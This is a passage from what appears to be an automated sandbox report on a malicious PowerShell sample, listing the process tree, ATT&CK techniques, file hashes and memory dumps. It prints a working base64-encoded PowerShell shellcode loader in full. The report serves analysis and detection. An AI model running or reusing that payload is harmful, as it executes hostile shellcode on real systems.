BcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQASwBnAGEAIAAkAFAAQgBVAHoAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAUABCAFUAegAgACQAZQAiADsAfQA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2132
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABvAFYAcQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AVgBxACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAYgAsADAAeABjAGQALAAwAHgANABmACwAMAB4ADYAOAAsADAAeABlADYALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANQA4ACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAOQA1ACwAMAB4ADUAYwAsADAAeAA4AGEALAAwAHgAMQAzACwAMAB4AGQAOQAsADAAeAA4AGIALAAwAHgAYwA1ACwAMAB4AGQAYwAsADAAeAAyADEALAAwAHgANABjACwAMAB4AGIAYQAsADAAeAA1ADUALAAwAHgAYwA0ACwAMAB4ADcAZAAsADAAeABlADgALAAwAHgAMAAyACwAMAB4ADgAZAAsADAAeAAyAGMALAAwAHgAMwBjACwAMAB4ADQAMAAsADAAeABjADMALAAwAHgAZABjACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgAZgA3ACwAMAB4AGQAMwAsADAAeAA3ADAALAAwAHgAZQAyACwAMAB4AGQAMQAsADAAeAA2ADAALAAwAHgAMABjACwAMAB4AGQAYgAsADAAeAAyAGMALAAwAHgAOAA4ACwAMAB4AGMAMAAsADAAeABkAGIALAAwAHgAZQAyACwAMAB4ADQAYQAsADAAeAA0ADIALAAwAHgAYQAwACwAMAB4AGYAOAAsADAAeAA5AGUALAAwAHgAYQA0ACwAMAB4ADkAOQAsADAAeAAzADMALAAwAHgAZAAzACwAMAB4AGEANQAsADAAeABkAGUALAAwAHgAOAAyACwAMAB4ADkAOQAsADAAeAA0AGEALAAwAHgAYgAyACwAMAB4ADQAMwAsADAAeABlADkALAAwAHgAYwA3ACwAMAB4ADIAMwAsADAAeABlADAALAAwAHgAYQBmACwAMAB4AGQAYgAsADAAeAA0ADIALAAwAHgAMgA2ACwAMAB4AGEANAAsADAAeAA2ADQALAAwAHgAMwBkACwAMAB4ADQAMwAsADAAeAA3AGIALAAwAHgAMQAwACwAMAB4AGYAMQAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADgAOQAsADAAeAA4ADIALAAwAHgAMQA0ACwAMAB4ADYAYwAsADAAeAAyAGIALAAwAHgANAA2ACwAMAB4ADIAZgAsADAAeAAyADQALAAwAHgAMwAzACwAMAB4AGUAZAAsADAAeABlADYALAAwAHgAYwAxACwAMAB4ADcAZgAsADAAeABkAGMALAAwAHgAMAA3ACwAMAB4ADYAMAAsADAAeAAwAGIALAAwAHgAMgBhACwAMAB4ADcAYwAsADAAeAA3ADIALAAwAHgAZABkACwAMAB4ADYAMgAsADAAeAA0ADIALAAwAHgAZAA5ACwAMAB4ADIAMAAsADAAeAA0AGIALAAwAHgANABmACwAMAB4ADIAMwAsADAAeAA2ADQALAAwAHgANgBjACwAMAB4AGEAZgAsADAAeAA1ADYALAAwAHgAOQBlACwAMAB4ADgAZQAsADAAeAA1ADIALAAwAHgANgAxACwAMAB4ADYANQAsADAAeABlAGMALAAwAHgAOAA4ACwAMAB4AGUANAAsADAAeAA3AGEALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAA1AGUALAAwAHgANQBmACwAMAB4ADYANgAsADAAeAA4ADgALAAwAHgAMwA5ACwAMAB4ADEANAAsADAAeAA2ADQALAAwAHgANgA1ACwAMAB4ADQAZAAsADAAeAA3ADIALAAwAHgANgA5ACwAMAB4ADcAOAAsADAAeAA4ADIALAAwAHgAMAA4ACwAMAB4ADkANQAsADAAeABmADEALAAwAHgAMgA1ACwAMAB4AGQAZgAsADAAeAAxAGYALAAwAHgANAAxACwAMAB4ADAAMgAsADAAeABmAGIALAAwAHgANAA0ACwAMAB4ADEAMgAsADAAeAAyAGIALAAwAHgANQBhACwAMAB4ADIAMQAsADAAeABmADUALAAwAHgANQA0ACwAMAB4AGIAYwAsADAAeAA4AGQALAAwAHgAYQBhACwAMAB4AGYAMAAsADAAeABiADYALAAwAHgAMwBjACwAMAB4AGIAZAAsADAAeAA4ADUALAAwAHgAMwA2ACwAMAB4AGIAZgAsADAAeABjADIALAAwAHgAZABiACwAMAB4AGEAMAAsADAAeAA3ADMALAAwAHgAMABlACwAMAB4AGUANAAsADAAeAAzADAALAAwAHgAMQBjACwAMAB4ADEAOQAsADAAeAA5ADcALAAwAHgAMAAyACwAMAB4ADgAMwAsADAAeABiADEALAAwAHgAMwBmACwAMAB4ADIAZgAsADAAeAA0AGMALAAwAHgAMQBmACwAMAB4AGMANwAsADAAeAAyADYALAAwAHgANQBhACwAMAB4AGEAMAAsADAAeAAxADcALAAwAHgAOAAwACwAMAB4ADAAYgAsADAAeAA1AGYALAAwAHgAOQA4ACwAMAB4AGYAMQAsADAAeAAwADIALAAwAHgAOQBiACwAMAB4AGMAYwAsADAAeABhADEALAAwAHgAMwBjACwAMAB4ADAAYQAsADAAeAA2AGQALAAwAHgAMgBhACwAMAB4AGIAZAAsADAAeABiADMALAAwAHgAYgA4ACwAMAB4AGMANwAsADAAeABiADcALAAwAHgAMgAzACwAMAB4ADUAMQAsADAAeAA4ADYALAAwAHgAZgAyACwAMAB4ADcAZQAsADAAeAAzAGQALAAwAHgAYgA0ACwAMAB4ADAAMgAsADAAeABjADYALAAwAHgAOABiACwAMAB4ADMAMQAsADAAeABlADQALAAwAHgAOQA2ACwAMAB4AGEAMwAsADAAeAAxADEALAAwAHgAYgA5ACwAMAB4ADUANgAsADAAeAAxADQALAAwAHgAZAAyACwAMAB4ADYAOQAsADAAeAAzAGUALAAwAHgANwBlACwAMAB4AGQAZAAsADAAeAA1ADYALAAwAHgANQBlACwAMAB4ADgAMQAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4AGYANAAsADAAeAA2AGUALAAwAHgAZQBlACwAMAB4ADUANwAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGEAYgAsADAAeAAyAGMALAAwAHgAMQAxACwAMAB4AGQANwAsADAAeAA2ADEALAAwAHgANAA5ACwAMAB4ADEAMQAsADAAeAA1ADMALAAwAHgAOAA2ACwAMAB4AGEAZAAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGUAMwAsADAAeABiAGQALAAwAHgAYgA3ACwAMAB4ADUANAAsADAAeABiAGUALAAwAHgAOQBjACwAMAB4ADEAMQAsADAAeAA2AGEALAAwAHgAMQA0ACwAMAB4ADgAYQAsADAAeAA5AGQALAAwAHgAZgBlACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAYwBhACwAMAB4ADkANgAsADAAeAA5ADkALAAwAHgANwA4ACwAMAB4ADMAYwAsADAAeAAzADkALAAwAHgANgAxACwAMAB4AGEAZgAsADAAeAAzADcALAAwAHgAZgAwACwAMAB4AGYANwAsADAAeAAxADAALAAwAHgAMgBmACwAMAB4AGYAZAAsADAAeAAxADcALAAwAHgAOQAxACwAMAB4AGEAZgAsADAAeABhAGIALAAwAHgANwBkACwAMAB4ADkAMQAsADAAeABjADcALAAwAHgAMABiACwAMAB4ADIANgAsADAAeABjADIALAAwAHgAZgAyACwAMAB4ADUAMwAsADAAeABmADMALAAwAHgANwA2ACwAMAB4AGEAZgAsADAAeABjADEALAAwAHgAZgBjACwAMAB4ADIAZQAsADAAeAAxAGMALAAwAHgANAAxACwAMAB4ADkANQAsADAAeABjAGMALAAwAHgANwBiACwAMAB4AGEANQAsADAAeAAzAGEALAAwAHgAMgBlACwAMAB4AGEAZQAsADAAeAAzADcALAAwAHgAMAA2ACwAMAB4AGYAOQAsADAAeAA5ADYALAAwAHgANABkACwAMAB4ADYANgAsADAAeAAzADkAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAE0AegBHAEEAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAE0AegBHAEEALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAE0AegBHAEEALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2804
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zlt4hezs.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2824
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE75.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEE74.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESEE75.tmp

Filesize
1KB

MD5
e54396b72ca413621019c55d0a511035

SHA1
cdeffdb7decc65c29b64ee10a3d87de6f3b3b235

SHA256
bf4d407350caf5d0e7b12b5fd7f36ebfe85b775221e2737df68271450076a54b

SHA512
45b4cb36c91b6691d66a7fbd013f312446bfe93b155f7211c1a0d09009ad3b96d35418d214f97ab322be326f9537a1f259d61ca65911cd1af0642b455af20115

Download Submit
C:\Users\Admin\AppData\Local\Temp\zlt4hezs.dll

Filesize
3KB

MD5
9a836a249bf206d7d26a1820e7fdc5ac

SHA1
5fe6520b7ebd8cfa68f1e16dfd3388098f44713d

SHA256
4cfe512c936099e07ffd808551536b0f9e06971014864bfd923499398b9d6926

SHA512
2c6bfe41eef7ad7ec42cec2e8c211e52ec5ff2e7e027387607586f286ee3a5b7c00a77ea5e8487062fb7a04572dc805b695c792cfba777865f586c8eb113f76b

Download Submit
C:\Users\Admin\AppData\Local\Temp\zlt4hezs.pdb

Filesize
7KB

MD5
ea77dd6662a320b71034c2354a94e474

SHA1
968f3cbfc4d3494ffea45bb5cd4570437b980ae1

SHA256
0743d93fcd758ef9d5f00bf687230bed88ae5b07c39a2d7e2841bfab8e955725

SHA512
ff90e46fcc83f45ca0a50a013b5324d2e876946f206889d649f7ae6f2f7306d3abbe719e39b82632caf5d80abada83746e44f25d6f720b89e366b842b3442313

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5eeaf744b50625c4592bf2d694b4b7f3

SHA1
8bd3bea508f0c18abeaddaffb097a5a4ba888d4c

SHA256
a432ba4f228eae1103bab51ed09efe54013d7876d2367efcfe4a053ab70211d3

SHA512
9f74f6adbe09812ae7bcbd9387355b0f57e83bdafe9411aa2ecdb378efcd2dea1a5829dc81bfb2456f9f214d300e50537885e6af0483b27d4902e527619ee31a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCEE74.tmp

Filesize
652B

MD5
2be60e3aa533e98d07c2363a6899b622

SHA1
1afe31fd514b06231d6e00076cb8be47dd4ded1f

SHA256
63ec3608c7efd422ebd4f4e029de876aaa880f4eddbeb26c399c5560d25a28bd

SHA512
2fff659b02bf73006ceb44f82e3bb2f293eba5d0b3c4225bd8228f060a6e60989c16e95831880f8ad8807e66bae3fb1f389771f80b2910652760f1a68e1199af

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zlt4hezs.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zlt4hezs.cmdline

Filesize
309B

MD5
8f997df8a8c0cd282af13a56c03492d3

SHA1
e64c88f63d7f07c964135b39008d75788c4f1f0e

SHA256
9e7e9f8e8b2ce7f74a7fee497dd2feccfd6573eb95b021013999b1e5aca565d5

SHA512
5d5c102d3def794a9b2fd4b0954a9ffc1c37548b9c9ddc2ecddaa65180c4db8f20a27aaa1f50d2ec26ac2b16192bfef29bb2ab4ef424ee9485a2feee6543db67

Download Submit
memory/1768-7-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/1768-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/1768-46-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/1768-4-0x000007FEF613E000-0x000007FEF613F000-memory.dmp

Filesize
4KB

Download
memory/1768-11-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/1768-5-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/1768-10-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/1768-8-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/1768-9-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/1768-42-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/1768-41-0x000007FEF613E000-0x000007FEF613F000-memory.dmp

Filesize
4KB

Download
memory/2172-43-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/2172-45-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/2172-17-0x000007FEF5E80000-0x000007FEF681D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-40-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download
memory/2804-44-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads